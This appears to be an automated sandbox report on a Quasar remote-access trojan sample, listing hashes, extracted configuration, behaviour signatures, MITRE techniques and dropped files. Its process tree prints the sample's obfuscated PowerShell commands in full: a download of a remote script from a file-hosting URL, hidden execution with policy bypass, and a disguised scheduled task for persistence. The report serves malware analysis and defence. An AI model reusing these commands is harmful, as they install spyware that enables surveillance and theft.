quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
111s
max time network
149s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
19/04/2025, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

winAPI.exe
Size

36.0MB
MD5

fb466528aac78a063f4c60882a33ddc9
SHA1

2af35fa26c27e402e66b7c46d136a4a578f975af
SHA256

6f157135b2b74872f88863cc5bd1edbe8fbe3532dfb9e1b961afca9bb5c77fd3
SHA512

0539f5681271f70262288fcc0b7bd89d63c6c8b8f32f96bd43878df531f9997cde314357f541ca49f58363c484cca80a107b450fd37e3e35e75fd90edac71e77
SSDEEP

393216:f1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYf8:fMguj8Q4VfvwqFTrYCl

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral17/memory/1784-60-0x000001D228630000-0x000001D2287BE000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

flow	pid	Process
14	1056	powershell.exe
41	1784	powershell.exe
43	1784	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6032	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1784	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
6032	powershell.exe
6032	powershell.exe
1056	powershell.exe
1056	powershell.exe
1784	powershell.exe
1784	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeIncreaseQuotaPrivilege	6032	powershell.exe
Token: SeSecurityPrivilege	6032	powershell.exe
Token: SeTakeOwnershipPrivilege	6032	powershell.exe
Token: SeLoadDriverPrivilege	6032	powershell.exe
Token: SeSystemProfilePrivilege	6032	powershell.exe
Token: SeSystemtimePrivilege	6032	powershell.exe
Token: SeProfSingleProcessPrivilege	6032	powershell.exe
Token: SeIncBasePriorityPrivilege	6032	powershell.exe
Token: SeCreatePagefilePrivilege	6032	powershell.exe
Token: SeBackupPrivilege	6032	powershell.exe
Token: SeRestorePrivilege	6032	powershell.exe
Token: SeShutdownPrivilege	6032	powershell.exe
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeSystemEnvironmentPrivilege	6032	powershell.exe
Token: SeRemoteShutdownPrivilege	6032	powershell.exe
Token: SeUndockPrivilege	6032	powershell.exe
Token: SeManageVolumePrivilege	6032	powershell.exe
Token: 33	6032	powershell.exe
Token: 34	6032	powershell.exe
Token: 35	6032	powershell.exe
Token: 36	6032	powershell.exe
Token: SeIncreaseQuotaPrivilege	6032	powershell.exe
Token: SeSecurityPrivilege	6032	powershell.exe
Token: SeTakeOwnershipPrivilege	6032	powershell.exe
Token: SeLoadDriverPrivilege	6032	powershell.exe
Token: SeSystemProfilePrivilege	6032	powershell.exe
Token: SeSystemtimePrivilege	6032	powershell.exe
Token: SeProfSingleProcessPrivilege	6032	powershell.exe
Token: SeIncBasePriorityPrivilege	6032	powershell.exe
Token: SeCreatePagefilePrivilege	6032	powershell.exe
Token: SeBackupPrivilege	6032	powershell.exe
Token: SeRestorePrivilege	6032	powershell.exe
Token: SeShutdownPrivilege	6032	powershell.exe
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeSystemEnvironmentPrivilege	6032	powershell.exe
Token: SeRemoteShutdownPrivilege	6032	powershell.exe
Token: SeUndockPrivilege	6032	powershell.exe
Token: SeManageVolumePrivilege	6032	powershell.exe
Token: 33	6032	powershell.exe
Token: 34	6032	powershell.exe
Token: 35	6032	powershell.exe
Token: 36	6032	powershell.exe
Token: SeIncreaseQuotaPrivilege	6032	powershell.exe
Token: SeSecurityPrivilege	6032	powershell.exe
Token: SeTakeOwnershipPrivilege	6032	powershell.exe
Token: SeLoadDriverPrivilege	6032	powershell.exe
Token: SeSystemProfilePrivilege	6032	powershell.exe
Token: SeSystemtimePrivilege	6032	powershell.exe
Token: SeProfSingleProcessPrivilege	6032	powershell.exe
Token: SeIncBasePriorityPrivilege	6032	powershell.exe
Token: SeCreatePagefilePrivilege	6032	powershell.exe
Token: SeBackupPrivilege	6032	powershell.exe
Token: SeRestorePrivilege	6032	powershell.exe
Token: SeShutdownPrivilege	6032	powershell.exe
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeSystemEnvironmentPrivilege	6032	powershell.exe
Token: SeRemoteShutdownPrivilege	6032	powershell.exe
Token: SeUndockPrivilege	6032	powershell.exe
Token: SeManageVolumePrivilege	6032	powershell.exe
Token: 33	6032	powershell.exe
Token: 34	6032	powershell.exe
Token: 35	6032	powershell.exe
Token: 36	6032	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1784	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 5464 wrote to memory of 6028	5464	winAPI.exe	83
PID 5464 wrote to memory of 6028	5464	winAPI.exe	83
PID 6028 wrote to memory of 836	6028	cmd.exe	84
PID 6028 wrote to memory of 836	6028	cmd.exe	84
PID 836 wrote to memory of 3908	836	cmd.exe	85
PID 836 wrote to memory of 3908	836	cmd.exe	85
PID 836 wrote to memory of 6032	836	cmd.exe	86
PID 836 wrote to memory of 6032	836	cmd.exe	86
PID 836 wrote to memory of 1056	836	cmd.exe	90
PID 836 wrote to memory of 1056	836	cmd.exe	90
PID 836 wrote to memory of 1784	836	cmd.exe	96
PID 836 wrote to memory of 1784	836	cmd.exe	96
PID 1784 wrote to memory of 4108	1784	powershell.exe	97
PID 1784 wrote to memory of 4108	1784	powershell.exe	97
PID 4108 wrote to memory of 5548	4108	csc.exe	98
PID 4108 wrote to memory of 5548	4108	csc.exe	98

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3908	attrib.exe

C:\Users\Admin\AppData\Local\Temp\winAPI.exe
"C:\Users\Admin\AppData\Local\Temp\winAPI.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:6028
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:836
  - - C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
      4⤵
      Views/modifies file attributes
      PID:3908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:1056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1784
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bf20fv0o\bf20fv0o.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4108
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF41F.tmp" "c:\Users\Admin\AppData\Local\Temp\bf20fv0o\CSC256C60B1C4764FB5B8CF872C7038C1D9.TMP"
        6⤵
        
        PID:5548

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
72c544c706b466fe693acc184ae08e0a

SHA1
a6cd2491d1b3cff2e1ea17e06d24bdb01de10060

SHA256
51f4572cb8f0a89954d6d129c8c6c3c55b07cd30d5fec76883b1e647c84c3f96

SHA512
511c871a8c933d85428bcc8014d14183e91e9d8c10f40747dbbc2a837d5a5e57fd251320fbd72051799709fcec0617bfd7042545276666645ba95df78a36fcdb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17c37b8a20f7cf5eadfcf2f7f176d30d

SHA1
a76ccfd7567f1517ced4eaa55af76d1300be1ae3

SHA256
0504d5fec1960d614083775c6c8641ecba19dc2eba363e7b0a0da28f9e3a6b39

SHA512
8b5dc923351e41448fcb13fb2503e8ba55c67fc2eb25e2e9f6b4cab93574cbfebc0a25406a0a3ce9876b43d818d7c37451127199b2035cd2b5a977baf0d26071

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF41F.tmp

Filesize
1KB

MD5
a45205175d53aa15393f2475fef1b68a

SHA1
77b1ca043e6fd526ff86e48276c356a0a36d14b3

SHA256
1293ee96e5f7c38e966b2ac6deb8afc66552513e47ac10e61fe684aeec714f2b

SHA512
e4f3a9cc5f6afbe3f9851170f9de142dcad9b1a2591349d31076539649c126a65771c1781d91647a2ccb31a0b65e4aa9e6f089acb5317c0fb45f3d61b1857c54

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sz0vdbum.psy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bf20fv0o\bf20fv0o.dll

Filesize
3KB

MD5
2d5d2242f40aac28a42616d81e97a46b

SHA1
ed602e26f739def40bd4cbe01ca72b892d99965a

SHA256
f0cb8e3ab750d50cd53691a2a6e70772d914d14d616b6c983ef05099d5bfaf7c

SHA512
529191fc3577e75056763d37a1967bea3b39428a7a4cda702d759f09b197bacb8ce53e922ee67b2c074c966f7cfa8e1fedb7edba43ea8d77403fcfe4c3c01527

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bf20fv0o\CSC256C60B1C4764FB5B8CF872C7038C1D9.TMP

Filesize
652B

MD5
1f6986bf198e5f6d83439dd5b1514da5

SHA1
6c240400e60b350291d50d45fbf0b3c70a60160e

SHA256
1c195731df437d79070f99bdac17b645d1ca37c1dd23317451e8492aca1aac95

SHA512
8930b79f9e2b3d8b824b1c5f15f429b4c059ebcf3215ccb1925d21383a0d59a70ca10837bfdad33f6230c16c0d5d7e534fc361eb63ba4d20755289f507bc7d7f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bf20fv0o\bf20fv0o.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bf20fv0o\bf20fv0o.cmdline

Filesize
369B

MD5
6b23ae2c26e35eff4af1f894c475e75b

SHA1
d899c529db548a8541f13a36afb11ad79decf492

SHA256
f1191051253bbe4bec3edb1d750c7d2fbc5287241572149926765f778ccabda2

SHA512
fd7529b14d9df84b086f933efe84de5eff9f92de6cd0d8abfc4a01253c3a454fc321cba6d9fe4902f13705b57177cbafa7ac864ed37894d010c9ceb13e83a046

Download Submit
memory/1784-62-0x000001D2285A0000-0x000001D2285B2000-memory.dmp

Filesize
72KB

Download
memory/1784-65-0x000001D27FE10000-0x000001D27FEC2000-memory.dmp

Filesize
712KB

Download
memory/1784-71-0x000001D27FD00000-0x000001D27FD3C000-memory.dmp

Filesize
240KB

Download
memory/1784-70-0x000001D264EC0000-0x000001D264ED2000-memory.dmp

Filesize
72KB

Download
memory/1784-68-0x000001D229660000-0x000001D2296AA000-memory.dmp

Filesize
296KB

Download
memory/1784-69-0x000001D2285F0000-0x000001D22861A000-memory.dmp

Filesize
168KB

Download
memory/1784-56-0x000001D228000000-0x000001D228008000-memory.dmp

Filesize
32KB

Download
memory/1784-58-0x000001D228020000-0x000001D22818A000-memory.dmp

Filesize
1.4MB

Download
memory/1784-60-0x000001D228630000-0x000001D2287BE000-memory.dmp

Filesize
1.6MB

Download
memory/1784-61-0x000001D2284B0000-0x000001D2284CA000-memory.dmp

Filesize
104KB

Download
memory/1784-67-0x000001D229610000-0x000001D22965C000-memory.dmp

Filesize
304KB

Download
memory/1784-63-0x000001D2285B0000-0x000001D2285EA000-memory.dmp

Filesize
232KB

Download
memory/1784-64-0x000001D27FC70000-0x000001D27FCC0000-memory.dmp

Filesize
320KB

Download
memory/1784-66-0x000001D2295C0000-0x000001D22960E000-memory.dmp

Filesize
312KB

Download
memory/6032-19-0x00007FF869FE0000-0x00007FF86AAA2000-memory.dmp

Filesize
10.8MB

Download
memory/6032-3-0x00007FF869FE3000-0x00007FF869FE5000-memory.dmp

Filesize
8KB

Download
memory/6032-13-0x00000158CEB30000-0x00000158CEB52000-memory.dmp

Filesize
136KB

Download
memory/6032-14-0x00007FF869FE0000-0x00007FF86AAA2000-memory.dmp

Filesize
10.8MB

Download
memory/6032-15-0x00007FF869FE0000-0x00007FF86AAA2000-memory.dmp

Filesize
10.8MB

Download
memory/6032-16-0x00007FF869FE0000-0x00007FF86AAA2000-memory.dmp

Filesize
10.8MB

Download